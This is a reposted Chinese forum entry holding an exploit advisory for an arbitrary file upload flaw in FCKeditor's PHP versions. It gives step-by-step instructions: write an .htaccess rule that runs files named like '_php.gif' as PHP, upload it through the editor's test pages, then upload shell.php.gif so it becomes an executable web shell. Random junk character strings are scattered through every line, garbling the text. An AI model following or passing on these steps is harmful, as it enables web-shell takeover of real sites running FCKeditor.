FCKeditor所有php版本Upload上传漏洞
9 B* a* ^. U; \( Y, L! O9 {+ o作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
, n# h( v& }# \ X减小字体 增大字体
7 h2 R$ D: A( n& c0 N* V9 H[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
- A' A8 Y. k @4 B[+] Date: 20110 A" `* e2 Z; d; j# `) [
[+] Author : sinesafe.cn/ E& k1 M2 }- @; n* V( O) G8 O
[+] Website : WwW.sinesafe.cn
: y( r4 o- D% W8 R; a( A———————————————————$ D9 i. `* m9 r5 g8 [+ `- A
1.create a htaccess file:/ }* d- q: i- o
code:
/ h v$ z& P$ _. W: R<FilesMatch “_php.gif”>
" U7 i- n0 {3 P: n+ ?, o& i8 rSetHandler application/x-httpd-php# M7 V, k3 K( q% C. N; K
</FilesMatch>
" X, ?$ A" E5 ]* O- \! F3 D
$ L' V6 ~3 O' a0 b5 T. z/ T. S2.Now upload this htaccess with FCKeditor.
) Q& L. A, {( u
8 w: r6 a3 ?# `* X8 K f- k4 Xhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html/ I' k. k0 Y9 y& J, c4 r- r N
8 p& @: j. J1 o5 a& w. e uhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html5 @" }8 q5 ?5 t4 ], W2 Y
. z: O9 F1 B2 D5 P+ r———————————————————————————————-1 H0 O7 X" J& ]# l% s) i+ N
3.Now upload shell.php.gif with FCKeditor.& ?3 a) q, U4 a" l# P+ \
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
/ b5 O. V$ g ^0 Y/ Q u, S5.http://www.sinesafe.cn/anything/shell_php.gif! J0 F# N- h, a9 |3 f9 _
6.Now shell is available from server. |
. Z5 }4 t4 p$ W+ r( O9 O1 y
g& [' ^' B- `9 p8 X! A6 H- n6 n: H' M4 v3 R7 t5 z" F
|
发表于 2013-10-27 17:25:21
收藏
支持
反对